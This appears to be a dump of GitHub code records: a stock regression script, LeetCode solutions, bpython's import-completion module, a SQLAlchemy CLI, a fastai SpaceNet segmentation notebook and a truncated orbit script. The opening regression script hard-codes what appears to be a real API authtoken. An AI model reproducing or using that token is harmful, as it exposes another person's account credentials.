authtoken=\"Ns1FcMzkyM-kGRMbixt2\")\r\n\r\n#print(df.head)\r\n\r\ndf = df[['Open', 'High', 'Low', 'Last', 'Volume']]\r\ndf['Volatility_PCT'] = (df['High']-df['Low'])/df['Low']*100.0\r\ndf['Inc_Dec_PCT'] = (df['Last']-df['Open'])/df['Open']*100.0\r\n\r\ndf = df[['Last', 'Volatility_PCT', 'Inc_Dec_PCT', 'Volume']]\r\n\r\nforecast_col = 'Last'\r\ndf.fillna(-99999, inplace=True)\r\n\r\nforecast_out = int(math.ceil(0.01*len(df))) # go back 10% of total number of days for the prediction\r\n'''\r\nHere we use the pandas shift method to shift the forecast_out label that is the label will have 'Last' values 10 days \r\ninto the future.\r\n'''\r\n\r\ndf['Labels'] = df[forecast_col].shift(-forecast_out)\r\ndf.dropna(inplace=True)\r\n\r\nX = np.array(df.drop(['Labels'], 1))\r\ny = np.array(df['Labels'])\r\nX = preprocessing.scale(X) #normalising x\r\ny = preprocessing.scale(y) #normalising y\r\n\r\nX_train, X_test, y_train, y_test = model_selection.train_test_split(X,y,test_size=0.2)\r\nclf1 = LinearRegression()\r\nclf1.fit(X_train, y_train)\r\naccuracy1 = clf1.score(X_test, y_test)\r\n\r\nclf2 = svm.SVR(kernel=\"linear\")\r\nclf2.fit(X_train, y_train)\r\naccuracy2 = clf2.score(X_test, y_test)\r\n\r\n\r\nprint(accuracy1, accuracy2)","repo_name":"AtrayeeNeog/Machine-Learning-1","sub_path":"Regression.py","file_name":"Regression.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5144298103","text":"\"\"\"\nGiven an array of intervals where intervals[i] = [starti, endi], return the\nminimum number of intervals you need to remove to make the rest of the\nintervals non-overlapping.\n\nExample 1:\n Input: intervals = [[1,2],[2,3],[3,4],[1,3]]\n Output: 1\n Explanation: [1,3] can be removed and the rest of the intervals are non-overlapping.\n\nExample 2:\n Input: intervals = [[1,2],[1,2],[1,2]]\n Output: 2\n Explanation: You need to remove two [1,2] to make the rest of the intervals non-overlapping.\n\nExample 3:\n Input: intervals = [[1,2],[2,3]]\n Output: 0\n Explanation: You don't need to remove any of the intervals since they're already non-overlapping.\n\"\"\"\nfrom typing import List\n\n\ndef solution(intervals: List[List[int]]):\n intervals.sort()\n\n res = 0\n prev_end = intervals[0][1]\n for start, end in intervals[1:]:\n if prev_end <= start:\n prev_end = end\n else:\n res += 1\n prev_end = min(end, prev_end)\n return res\n\n\nprint(solution([[1, 2], [2, 3], [3, 4], [1, 3]]))\nprint(solution([[1, 2], [1, 2], [1, 2]]))\nprint(solution([[1, 2], [2, 3]]))\n","repo_name":"pushpa66/Learn-data-structures-and-algorithms-in-python","sub_path":"75/Q36 Non Overlapping Intervals_Leetcode 435.py","file_name":"Q36 Non Overlapping Intervals_Leetcode 435.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71388570729","text":"import fnmatch\nimport importlib.machinery\nimport sys\nimport warnings\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Optional, Set, Generator, Sequence, Iterable, Union\n\nfrom .line import (\n current_word,\n current_import,\n current_from_import_from,\n current_from_import_import,\n)\n\nSUFFIXES = importlib.machinery.all_suffixes()\nLOADERS = (\n (\n importlib.machinery.ExtensionFileLoader,\n importlib.machinery.EXTENSION_SUFFIXES,\n ),\n (\n importlib.machinery.SourceFileLoader,\n importlib.machinery.SOURCE_SUFFIXES,\n ),\n)\n\n_LOADED_INODE_DATACLASS_ARGS = {\"frozen\": True}\nif sys.version_info[:2] >= (3, 10):\n _LOADED_INODE_DATACLASS_ARGS[\"slots\"] = True\n\n\n@dataclass(**_LOADED_INODE_DATACLASS_ARGS)\nclass _LoadedInode:\n dev: int\n inode: int\n\n\nclass ModuleGatherer:\n def __init__(\n self,\n paths: Optional[Iterable[Union[str, Path]]] = None,\n skiplist: Optional[Sequence[str]] = None,\n ) -> None:\n \"\"\"Initialize module gatherer with all modules in `paths`, which should be a list of\n directory names. If `paths` is not given, `sys.path` will be used.\"\"\"\n\n # Cached list of all known modules\n self.modules: Set[str] = set()\n # Set of (st_dev, st_ino) to compare against so that paths are not repeated\n self.paths: Set[_LoadedInode] = set()\n # Patterns to skip\n self.skiplist: Sequence[str] = (\n skiplist if skiplist is not None else tuple()\n )\n self.fully_loaded = False\n\n if paths is None:\n self.modules.update(sys.builtin_module_names)\n paths = sys.path\n\n self.find_iterator = self.find_all_modules(\n Path(p).resolve() if p else Path.cwd() for p in paths\n )\n\n def module_matches(self, cw: str, prefix: str = \"\") -> Set[str]:\n \"\"\"Modules names to replace cw with\"\"\"\n\n full = f\"{prefix}.{cw}\" if prefix else cw\n matches = (\n name\n for name in self.modules\n if (name.startswith(full) and name.find(\".\", len(full)) == -1)\n )\n if prefix:\n return {match[len(prefix) + 1 :] for match in matches}\n else:\n return set(matches)\n\n def attr_matches(\n self, cw: str, prefix: str = \"\", only_modules: bool = False\n ) -> Set[str]:\n \"\"\"Attributes to replace name with\"\"\"\n full = f\"{prefix}.{cw}\" if prefix else cw\n module_name, _, name_after_dot = full.rpartition(\".\")\n if module_name not in sys.modules:\n return set()\n module = sys.modules[module_name]\n if only_modules:\n matches = {\n name\n for name in dir(module)\n if name.startswith(name_after_dot)\n and f\"{module_name}.{name}\" in sys.modules\n }\n else:\n matches = {\n name for name in dir(module) if name.startswith(name_after_dot)\n }\n module_part = cw.rpartition(\".\")[0]\n if module_part:\n matches = {f\"{module_part}.{m}\" for m in matches}\n\n return matches\n\n def module_attr_matches(self, name: str) -> Set[str]:\n \"\"\"Only attributes which are modules to replace name with\"\"\"\n return self.attr_matches(name, only_modules=True)\n\n def complete(self, cursor_offset: int, line: str) -> Optional[Set[str]]:\n \"\"\"Construct a full list of possibly completions for imports.\"\"\"\n tokens = line.split()\n if \"from\" not in tokens and \"import\" not in tokens:\n return None\n\n result = current_word(cursor_offset, line)\n if result is None:\n return None\n\n from_import_from = current_from_import_from(cursor_offset, line)\n if from_import_from is not None:\n import_import = current_from_import_import(cursor_offset, line)\n if import_import is not None:\n # `from a import ` completion\n matches = self.module_matches(\n import_import.word, from_import_from.word\n )\n matches.update(\n self.attr_matches(import_import.word, from_import_from.word)\n )\n else:\n # `from ` completion\n matches = self.module_attr_matches(from_import_from.word)\n matches.update(self.module_matches(from_import_from.word))\n return matches\n\n cur_import = current_import(cursor_offset, line)\n if cur_import is not None:\n # `import ` completion\n matches = self.module_matches(cur_import.word)\n matches.update(self.module_attr_matches(cur_import.word))\n return matches\n else:\n return None\n\n def find_modules(self, path: Path) -> Generator[Optional[str], None, None]:\n \"\"\"Find all modules (and packages) for a given directory.\"\"\"\n if not path.is_dir():\n # Perhaps a zip file\n return\n if any(fnmatch.fnmatch(path.name, entry) for entry in self.skiplist):\n # Path is on skiplist\n return\n\n finder = importlib.machinery.FileFinder(str(path), *LOADERS) # type: ignore\n try:\n for p in path.iterdir():\n if p.name.startswith(\".\") or p.name == \"__pycache__\":\n # Impossible to import from names starting with . and we can skip __pycache__\n continue\n elif any(\n fnmatch.fnmatch(p.name, entry) for entry in self.skiplist\n ):\n # Path is on skiplist\n continue\n elif not any(p.name.endswith(suffix) for suffix in SUFFIXES):\n # Possibly a package\n if \".\" in p.name:\n continue\n elif p.is_dir():\n # Unfortunately, CPython just crashes if there is a directory\n # which ends with a python extension, so work around.\n continue\n name = p.name\n for suffix in SUFFIXES:\n if name.endswith(suffix):\n name = name[: -len(suffix)]\n break\n if name == \"badsyntax_pep3120\":\n # Workaround for issue #166\n continue\n\n package_pathname = None\n try:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", ImportWarning)\n spec = finder.find_spec(name)\n if spec is None:\n continue\n if spec.submodule_search_locations is not None:\n package_pathname = spec.submodule_search_locations[\n 0\n ]\n except (ImportError, OSError, SyntaxError, UnicodeEncodeError):\n # UnicodeEncodeError happens with Python 3 when there is a filename in some invalid encoding\n continue\n\n if package_pathname is not None:\n path_real = Path(package_pathname).resolve()\n try:\n stat = path_real.stat()\n except OSError:\n continue\n loaded_inode = _LoadedInode(stat.st_dev, stat.st_ino)\n if loaded_inode not in self.paths:\n self.paths.add(loaded_inode)\n for subname in self.find_modules(path_real):\n if subname is None:\n yield None # take a break to avoid unresponsiveness\n elif subname != \"__init__\":\n yield f\"{name}.{subname}\"\n yield name\n except OSError:\n # Path is not readable\n return\n yield None # take a break to avoid unresponsiveness\n\n def find_all_modules(\n self, paths: Iterable[Path]\n ) -> Generator[None, None, None]:\n \"\"\"Return a list with all modules in `path`, which should be a list of\n directory names. If path is not given, sys.path will be used.\"\"\"\n\n for p in paths:\n for module in self.find_modules(p):\n if module is not None:\n self.modules.add(module)\n yield\n\n def find_coroutine(self) -> bool:\n if self.fully_loaded:\n return False\n\n try:\n next(self.find_iterator)\n except StopIteration:\n self.fully_loaded = True\n\n return True\n","repo_name":"bpython/bpython","sub_path":"bpython/importcompletion.py","file_name":"importcompletion.py","file_ext":"py","file_size_in_byte":8777,"program_lang":"python","lang":"en","doc_type":"code","stars":2476,"dataset":"github-code","pt":"53"} +{"seq_id":"4548395954","text":"from darbuotojas import engine, Darbuotojas, Base\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom datetime import datetime\r\n\r\nSession = sessionmaker(bind=engine)\r\nsession = Session()\r\n\r\nwhile True:\r\n pasirinkimas = int(input(\"Pasirinkite: 1 - darbuotojo įvedimas, 2 - trynimas, 3 - atnaujinimas, 8 - peržiūra, 9 - išeiti\"))\r\n if pasirinkimas == 1:\r\n while True:\r\n try:\r\n name = input(\"Įveskite vardą\")\r\n last_name = input(\"Įveskite pavardę\")\r\n birthdate = datetime.strptime(input(\"Įveskite gimimo datą (YYYY-MM-DD)\"), \"%Y-%m-%d\")\r\n position = input(\"Įveskite pareigas\")\r\n salary = float(input(\"Įveskite atlyginimą\"))\r\n darbuotojas = Darbuotojas(name, last_name, birthdate, position, salary)\r\n session.add(darbuotojas)\r\n session.commit()\r\n break\r\n except:\r\n print(\"Klaida. Bandykite dar kartą\")\r\n if pasirinkimas == 2:\r\n visi = session.query(Darbuotojas).all()\r\n for darbuotojas in visi:\r\n print(darbuotojas)\r\n numeris = int(input(\"Pasirinkite norimo ištrinti įrašo ID\"))\r\n trinamas_darbuotojas = session.query(Darbuotojas).get(numeris)\r\n session.delete(trinamas_darbuotojas)\r\n session.commit()\r\n if pasirinkimas == 3:\r\n visi = session.query(Darbuotojas).all()\r\n for darbuotojas in visi:\r\n print(darbuotojas)\r\n numeris = int(input(\"Pasirinkite norimo redaguoti įrašo ID\"))\r\n darbuotojas = session.query(Darbuotojas).get(numeris)\r\n while True:\r\n try:\r\n darbuotojas.name = input(\"Įveskite vardą\")\r\n darbuotojas.last_name = input(\"Įveskite pavardę\")\r\n darbuotojas.birthdate = datetime.strptime(input(\"Įveskite gimimo datą (YYYY-MM-DD)\"), \"%Y-%m-%d\")\r\n darbuotojas.position = input(\"Įveskite pareigas\")\r\n darbuotojas.salary = float(input(\"Įveskite atlyginimą\"))\r\n session.commit()\r\n break\r\n except:\r\n print(\"Klaida. Bandykite dar kartą\")\r\n if pasirinkimas == 8:\r\n visi = session.query(Darbuotojas).all()\r\n for darbuotojas in visi:\r\n print(darbuotojas)\r\n if pasirinkimas == 9:\r\n print(\"Viso gero\")\r\n break\r\n\r\n","repo_name":"DonatasNoreika/python1lygis","sub_path":"Programos/Duomenų bazės 2 - SQLAlchemy ORM/1 užduotis/1uzduotis.py","file_name":"1uzduotis.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"lt","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"74716445607","text":"# Solicitar el ingreso de números al usuario y emitir un mensaje para \n# determinar si es par o impar. El ciclo debe finalizar cuando el \n# usuario ingresa 0.\n\n\nwhile(True):\n x = int(input(\"Introduzca un numero para saber si es par o impar\"\n \" (numero 0 para salir)\\n\"))\n if (x == 0):\n break\n elif (x % 2 == 0):\n print(f\"El numero {x} es PAR\")\n else:\n print(f\"El numero {x} es IMPAR\")\n\nprint(\"FIN EJECUCION\")\n","repo_name":"AlexisRmnk/practicaInformatorio2022","sub_path":"prog_web/01_python/practicas_01_informatorio/ejercicios_complementarios/02_repetitivas/ej05.py","file_name":"ej05.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35858876807","text":"\"\"\"\n给定两个大小为 m 和 n 的有序数组 nums1 和 nums2。\n\n请你找出这两个有序数组的中位数,并且要求算法的时间复杂度为 O(log(m + n))。\n\n你可以假设 nums1 和 nums2 不会同时为空。\n\n示例 1:\n\nnums1 = [1, 3]\nnums2 = [2]\n\n则中位数是 2.0\n示例 2:\n\nnums1 = [1, 2]\nnums2 = [3, 4]\n\n则中位数是 (2 + 3)/2 = 2.5\n\"\"\"\n\n\ndef find_median_sorted_arrays(nums1: list, nums2: list) -> float:\n nums = nums1+nums2\n nums = sorted(nums)\n print(nums)\n length = len(nums)\n if length == 1:\n return float(nums[0])\n elif length % 2:\n return float(nums[length // 2 ])\n else:\n mid = length // 2\n return (nums[mid]+nums[mid-1]) / 2\n\n\nif __name__ == '__main__':\n a = [1, 3]\n b = [2]\n print(find_median_sorted_arrays(a, b))\n","repo_name":"ZhangzhiS/study_note","sub_path":"Algorithm/median_of_two_sorted_arrays.py","file_name":"median_of_two_sorted_arrays.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"44595138694","text":"import json\nimport os\n\nfrom utils import post_processing\n\n\ndef create_dataset():\n \"\"\"read the config file\"\"\"\n with open(\"/root/config.json\", \"r\") as f:\n config = json.load(f)\n\n # create environmental variables\n for (key, value) in config.items():\n os.environ[key] = str(value)\n\n # run blender\n command = '/usr/lib/blender/blender {} --python {} --background'.\\\n format(\"/root/models/default.blend\", \"/root/rendering.py\")\n os.system(command)\n\n # post processing\n post_processing()\n\n\nif __name__ == '__main__':\n create_dataset()","repo_name":"defqoon/synthetic-data-generator","sub_path":"src/dataset_creation.py","file_name":"dataset_creation.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"33088782060","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Spacenet\n# \n# https://medium.com/the-downlinq/establishing-a-machine-learning-workflow-530628cfe67\n# \n# https://medium.com/the-downlinq/object-detection-on-spacenet-5e691961d257\n# \n# https://medium.com/the-downlinq/the-spacenet-metric-612183cc2ddb\n# \n# https://medium.com/the-downlinq/a-baseline-model-for-the-spacenet-4-off-nadir-building-detection-challenge-6b7983312b4b\n# \n# https://medium.com/the-downlinq\n# \n# Fastai lesson 3\n# \n# https://github.com/hiromis/notes/blob/master/Lesson3.md\n# \n\n\n# In[2]:\n\n\nimport datetime\nimport uuid\n\n\n# In[3]:\n\n\nfrom fastai import *\nfrom fastai.vision import *\nfrom fastai.callbacks.hooks import *\n\n\n# In[4]:\n\n\nimport PIL.Image as pil_image\n\n\n# In[5]:\n\n\nimport fastai\nprint(fastai.__version__)\n\n\n# In[6]:\n\n\ntorch.cuda.set_device(1)\n\n\n# In[7]:\n\n\nDATE = datetime.datetime.today().strftime('%Y%m%d')\nprint(f'DATE: {DATE}') \n\n\n# In[8]:\n\n\n#bs of 8\n#DATE='20181204'\n\n\n# In[9]:\n\n\nUID=str(uuid.uuid4())[:8]\nprint(f'UID: {UID}') \n\n\n# In[10]:\n\n\n#UID='81940436'\n\n\n# In[11]:\n\n\nARCH = models.resnet34\nARCH_NAME = 'rn34'\nMODEL_NAME = 'unet'\n\n\n# In[12]:\n\n\nSUB_NUM='1'\n\n\n# In[13]:\n\n\npath = Path('../../../data/SpaceNet_Off-Nadir_Dataset')\n\n\n# In[14]:\n\n\nssd_path = Path('../../../ssd_data/SpaceNet_Off-Nadir_Dataset')\nssd_path.ls()\n\n\n# In[15]:\n\n\npath_original_lbl = path/'masks'\npath_original_img = path/'train_rgb'\nfnames_original = get_image_files(path_original_img)\nlbl_original_names = get_image_files(path_original_lbl)\n\n\n# In[16]:\n\n\npath_hd_img = path/'resized_train'\npath_hd_lbl = path/'resized_masks'\npath_hd_test = path/'resized_test'\n\n\n# In[17]:\n\n\ninput_hd_test = path/'test_rgb'\ninput_test = ssd_path/'test_rgb'\n\n\n# In[18]:\n\n\npath_img = ssd_path/'resized_train'\npath_lbl = ssd_path/'resized_masks'\npath_test = ssd_path/'resized_test'\n\n\n# In[19]:\n\n\nfnames = get_image_files(path_img)\nlbl_names = get_image_files(path_lbl)\ntest_fnames = get_image_files(path_test)\nfnames[:2], lbl_names[:2], test_fnames[:2] \n\n\n# In[20]:\n\n\nlen(fnames), len(lbl_names), len(test_fnames)\n\n\n# In[21]:\n\n\n#only 1064 masks and images - but multiple nadirs\n\n\n# In[22]:\n\n\nimage_ids =[]\nimage_names=[]\nchannel_types=[]\nnadir_angles=[]\nmask_names=[]\nnadir_types=[]\nfor n in fnames:\n parts = str(n).split('_')\n im_id = '_'.join(parts[-2:])\n image_ids.append(im_id)\n indici = [i for i, s in enumerate(parts) if 'nadir' in s]\n indici=indici[0]\n \n nadir_angle = parts[indici].split('nadir')[1]\n nadir_angles.append(nadir_angle)\n if int(nadir_angle) < 26:\n angle_set = 'nadir'\n elif int(nadir_angle) > 25 and int(nadir_angle) < 40:\n angle_set = 'offnadir'\n elif int(nadir_angle) > 40:\n angle_set = 'faroffnadir'\n nadir_types.append(angle_set)\n \n fname_part = str(n).split('/')[-1]\n image_names.append(fname_part)\n \n channel_type = str(fname_part).split('Atlanta')[0][:-1]\n channel_types.append(channel_type)\n \n mask_name = 'mask_'+im_id\n mask_names.append(mask_name)\n\n\n# In[23]:\n\n\nlen(list(set(image_ids)))\n\n\n# In[24]:\n\n\ntrain_df = pd.DataFrame(\n {'image_name': image_names,\n 'channel_type': channel_types,\n 'nadir_angle': nadir_angles,\n 'nadir_type': nadir_types,\n 'mask_name': mask_names\n })\n\n\n# In[25]:\n\n\ntrain_df.head()\n\n\n# In[26]:\n\n\ntrain_df['channel_type'].unique()\n\n\n# In[27]:\n\n\ntrain_df['nadir_angle'].unique()\n\n\n# In[28]:\n\n\nmask_n = train_df['mask_name'][0]\nmask = open_mask(path_lbl/f'{mask_n}', div=True)\nsrc_size = np.array(mask.shape[1:])\n\n\n# In[29]:\n\n\nmask.shape[1:], src_size\n\n\n# ## Make DataBunch\n\n# In[30]:\n\n\nsize = src_size\nbs=4\n\n\n# In[31]:\n\n\ncodes = np.array(['nadir','offnadir','faroffnadir'])\n\n\n# In[32]:\n\n\nholdout_grids = ['735851','747551','741251','746201']\nvalid_idx = [i for i,o in enumerate(fnames) if any(c in str(o) for c in holdout_grids)]\n\n\n# In[33]:\n\n\nlen(valid_idx)\n\n\n# In[34]:\n\n\ndef get_y_fn(full_name):\n parts = str(full_name).split('_')\n im_id = '_'.join(parts[-2:])\n mask_name = 'mask_'+im_id\n return path_lbl/f'{mask_name}'\n\n\n# In[35]:\n\n\n# overriding to set open_mask(fn, div=True), probably a better way to do this\n# idea from https://forums.fast.ai/t/unet-binary-segmentation/29833/19\n\nclass MySegmentationLabelList(ImageItemList):\n def __init__(self, items:Iterator, classes:Collection=None, **kwargs):\n super().__init__(items, **kwargs)\n self.classes,self.loss_func = classes,CrossEntropyFlat()\n self.c = len(self.classes)\n\n def new(self, items, classes=None, **kwargs):\n return self.__class__(items, ifnone(classes, self.classes), **kwargs)\n\n def open(self, fn): return open_mask(fn, div=True)\n \nclass MySegmentationItemList(ImageItemList): _label_cls = SegmentationLabelList\n\n\n# In[36]:\n\n\n#if dont have split_by_idx then get wrong type\n\n\n# In[37]:\n\n\ndef create_my_data():\n src = (MySegmentationItemList.from_folder(path_img)\n .split_by_idx(valid_idx)\n .label_from_func(get_y_fn, classes=codes))\n tfms = get_transforms(flip_vert=True, max_warp=0, max_zoom=1.2, max_lighting=0.3)\n data = (src.transform(tfms, size=size, tfm_y=True)\n .databunch(bs=bs)\n .normalize(imagenet_stats))\n return src, tfms, data\n\n\n# In[38]:\n\n\ndef create_data():\n src = (SegmentationItemList.from_folder(path_img)\n .split_by_idx(valid_idx)\n .label_from_func(get_y_fn, classes=codes))\n tfms = get_transforms(flip_vert=True, max_warp=0, max_zoom=1.2, max_lighting=0.3)\n #transform mask in same way as image - tfm_y=True\n data = (src.transform(tfms, size=size, tfm_y=True)\n .databunch(bs=bs)\n .normalize(imagenet_stats))\n return src, tfms, data\n\n\n# In[39]:\n\n\n#src, tfms, data = create_my_data()\n\n\n# In[40]:\n\n\nsrc, tfms, data = create_data()\n\n\n# In[41]:\n\n\ndata.show_batch(2, figsize=(10,7))\n\n\n# In[42]:\n\n\ndata.show_batch(2, figsize=(10,7), ds_type=DatasetType.Valid)\n\n\n# ### save data for later re-load\n\n# In[43]:\n\n\ndata.export()\n\n\n# In[44]:\n\n\ndata.train_ds.x[1]\n\n\n# In[45]:\n\n\ndata.train_ds.y[1]\n\n\n# In[46]:\n\n\ndata.train_ds.y[1].data\n\n\n# In[47]:\n\n\n#data.show_batch(2,figsize=(4,4))\n\n\n# In[48]:\n\n\n#data.show_batch(2,figsize=(4,4), ds_type=DatasetType.Valid)\n\n\n# ## Train\n\n# In[49]:\n\n\niou = partial(dice, iou=True)\nmetrics = [iou, dice]\n\n\n# In[50]:\n\n\nlearn = unet_learner(data, ARCH, metrics=[accuracy])\n\n\n# In[51]:\n\n\n#cant do this with dynamic unet\n#learn.model = torch.nn.DataParallel(learn.model, device_ids=[0, 1])\n\n\n# In[52]:\n\n\n#layer_groups_total = len(learn.layer_groups[0])\n#for i in range(layer_groups_total):\n# learn.layer_groups[0][i] = nn.DataParallel(learn.layer_groups[0][i], device_ids=[0, 1])\n\n\n# In[53]:\n\n\nlearn.lr_find()\nlearn.recorder.plot()\n\n\n# In[ ]:\n\n\nlr = 1e-3\n\n\n# In[ ]:\n\n\nlearn.fit_one_cycle(10, max_lr=lr)\n\n\n# In[ ]:\n\n\nlearn.save(f'{DATE}-{ARCH_NAME}-{MODEL_NAME}-stage1')\n\n\n# In[ ]:\n\n\nlearn.load(f'{DATE}-{ARCH_NAME}-{MODEL_NAME}-stage1')\n\n\n# In[ ]:\n\n\nlearn.unfreeze()\n\n\n# In[ ]:\n\n\nlearn.lr_find()\nlearn.recorder.plot()\n\n\n# In[ ]:\n\n\nlearn.fit_one_cycle(10, max_lr=slice(1e-5,lr/5))\n\n\n# In[ ]:\n\n\nlearn.save(f'{DATE}-{ARCH_NAME}-{MODEL_NAME}-stage2')\n\n\n# In[ ]:\n\n\nlearn.load(f'{DATE}-{ARCH_NAME}-{MODEL_NAME}-stage2')\n\n\n# In[ ]:\n\n\nlearn.unfreeze()\n\n\n# In[ ]:\n\n\nlearn.lr_find()\nlearn.recorder.plot()\n\n\n# In[ ]:\n\n\ndef acc_fixed(input, targs):\n #input.shape: torch.Size([4, 3, 450, 450]), targs.shape: torch.Size([4, 1, 450, 450]) \n n = targs.shape[0]\n targs = targs.squeeze(1)\n #reshape the tensor to n rows, unknown number of columns\n targs = targs.view(n,-1)\n #targs.view: torch.Size([4, 202500])\n #Returns the indices of the maximum values along an axis\n input = input.view(n,3,-1).argmax(dim=1)\n #input.view: torch.Size([4, 202500])\n return (input==targs).float().mean()\n\n\n# In[ ]:\n\n\nlearn.metrics = [acc_fixed, iou, dice]\n\n\n# In[ ]:\n\n\nlearn.fit_one_cycle(10, max_lr=slice(1e-5,1e-3))\n\n\n# In[ ]:\n\n\nlearn.save(f'{DATE}-{ARCH_NAME}-{MODEL_NAME}-stage2_2')\n\n\n# In[ ]:\n\n\nlearn.model.train()\n\n\n# In[ ]:\n\n\nlearn.fit_one_cycle(10, max_lr=slice(1e-5,1e-3))\n\n\n# In[ ]:\n\n\nlearn.save(f'{DATE}-{ARCH_NAME}-{MODEL_NAME}-stage3')\n\n\n# ## Preds\n\n# https://spacenetchallenge.github.io/datasets/spacenet-OffNadir-summary.html\n# \n# In the SpaceNet Off-Nadir Building Extraction Challenge, the metric for ranking entries is the SpaceNet Metric.\n# This metric is an F1-Score based on the intersection over union of two building footprints with a threshold of 0.5\n# \n# F1-Score is calculated by taking the total True Positives, False Positives, and False Negatives for each nadir segement and then averaging the F1-Score for each segement.\n# \n# F1-Score Total = mean(F1-Score-Nadir, F1-Score-Off-Nadir, F1-Score-Very-Off-Nadir)\n\n# Your output must be a CSV file with almost identical format to the building footprint definition files.\n# \n# ImageId,BuildingId,PolygonWKT_Pix,Confidence\n# \n# Your output file may or may not include the above header line. The rest of the lines should specify the buildings your algorithm extracted, one per line.\n# \n# The required fields are:\n# \n# ImageId is a string that uniquely identifies the image.\n# BuildingId is an integer that identifies a building in the image, it should be unique within an image and must be positive unless the special id of -1 is used. -1 must be used to signal that there are no buildings in the image.\n# PolygonWKT_Pix specifies the points of the shape that represents the building you found. The format is exactly the same as given above in the Input files section. Important to know that the coordinates must be given in the scale of the 3-band images. So if you find a building that has a corner at (40, 20) on the 3-band image and (10, 5) on the corresponding 8-band image then your output file should have a (40 20 0) coordinate triplet listed in the shape definition.\n# Confidence is a positive real number, higher numbers mean you are more confident that this building is indeed present. See the details of scoring for how this value is used.\n# Your output must be a single file with .csv extension. Optionally the file may be zipped, in which case it must have .zip extension. The file must not be larger than 150MB and must not contain more than 2 million lines.\n# \n# Your algorithm must process the image tiles of the test set one by one, that is when you are predicting building footprints you must not use information from other tiles of the test set.\n# \n\n# In[ ]:\n\n\npath_test = path/'resized_test'\ntest_fnames = get_image_files(path_test)\n\n\n# In[ ]:\n\n\nlearn.load(f'{DATE}-{ARCH_NAME}-{MODEL_NAME}-stage3')\nlearn.model.eval()\n\n\n# In[ ]:\n\n\ndef pred_images(test_file_names):\n #im_files = glob.glob(f\"{test_path}/*.png\")\n i=0\n for fname in test_file_names:\n # load image and predict\n img = open_image(fname)\n pred_class, pred_idx, outputs = learn.predict(img)\n if i<10:\n display(img); display(names[pred_class]); display(outputs)\n i+=1\n\n\n# In[ ]:\n\n\npred_images(test_fnames)\n\n\n# In[ ]:\n\n\noutputs.shape\n\n\n# In[ ]:\n\n\nplt.imshow((to_np(outputs[0][1])))\n\n\n# In[ ]:\n\n\nfor i in range(20):\n\n fig, (ax1, ax2) = plt.subplots(1,2, figsize=(10,5))\n\n data.valid_ds.x[i].show(ax=ax1)\n ax1.set_title('Prediction')\n ax1.imshow((to_np(outputs[i][1])), alpha=0.6)\n \n ax2.set_title('Ground Truth')\n data.valid_ds.x[i].show(ax=ax2)\n data.valid_ds.y[i].show(ax=ax2, alpha=0.6)\n plt.show()\n\n\n# In[ ]:\n\n\n# see stpacenetutilities.labeltools.corelabeltools createGeoJSONFromRaster\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"adriangrepo/spacenet_buildingdetector","sub_path":"dl/scripts/spacenet.py","file_name":"spacenet.py","file_ext":"py","file_size_in_byte":11526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29375070275","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# Gaussian profile\ndef bottom_gauss(H0,sill_height,sill_position,sill_width):\n H = np.ones(Ndx)*H0\n gauss = sill_height*np.exp(-(np.linspace(-1,1,Ndx)-sill_position)**2/(2*sill_width**2))\n return H - gauss\n\nL = 200e3\na,b = 0,L #Lower and upper boundaries of the domain\nNdx = 200 #Number of grid steps\ndx = (b-a)/Ndx\n\nx = np.linspace(a,b,Ndx)\n\nH = bottom_gauss(500,450,-1/2,0.1)\n\nplt.figure()\nplt.plot(x/1000,-H,'k')\nplt.axhline(y=0, color='r', linestyle='--')\nplt.fill(x/1000,-H)\nplt.xlim([x[0]/1000,x[-1]/1000])\nplt.ylim([-500,10])\nplt.xlabel(r'$x$ (km)')\nplt.ylabel('depth (m)')\nplt.grid()\nplt.show()\nplt.savefig('depth_profile.png',dpi=300)","repo_name":"akotilis/SOAC-Project","sub_path":"depth_profile.py","file_name":"depth_profile.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24735083937","text":"from math import sin, cos, tan, atan, sqrt, radians, pi\r\nglobal no_of_with_orbits, max_loops\r\n\r\norb_wds_disc = [] # key: coor_2k & discoverer designation & components\r\norb_per = []\r\norb_alfa = []\r\norb_incl = []\r\norb_node = []\r\norb_time = []\r\norb_ecc = []\r\norb_long = []\r\norb_grade = []\r\norb_may_be_calc = []\r\norb_per_e = []\r\norb_alfa_e = [] \r\norb_incl_e = [] \r\norb_node_e = []\r\norb_time_e = []\r\norb_ecc_e = []\r\norb_long_e = []\r\norb_has_errors = []\r\n\r\nclass Position:\r\n\r\n def __init__(self, coor_2k, disc, comp, date_last, pa_last, sep_last, note):\r\n\r\n self.coor_2k = coor_2k\r\n self.disc = disc\r\n self.comp = comp\r\n self.epoch = float(date_last)\r\n self.obsv_pos_pa = float(pa_last) # last precise\r\n self.obsv_pos_sep = float(sep_last) # last precise\r\n self.note = note\r\n self.calc_pos_pa = 0 #\r\n self.calc_pos_sep = 0 #\r\n self.diff_pos_pa = 0 #\r\n self.diff_pos_sep = 0 #\r\n self.calc_pos_pa_err_min = 0 # - error\r\n self.calc_pos_sep_err_min = 0 # - 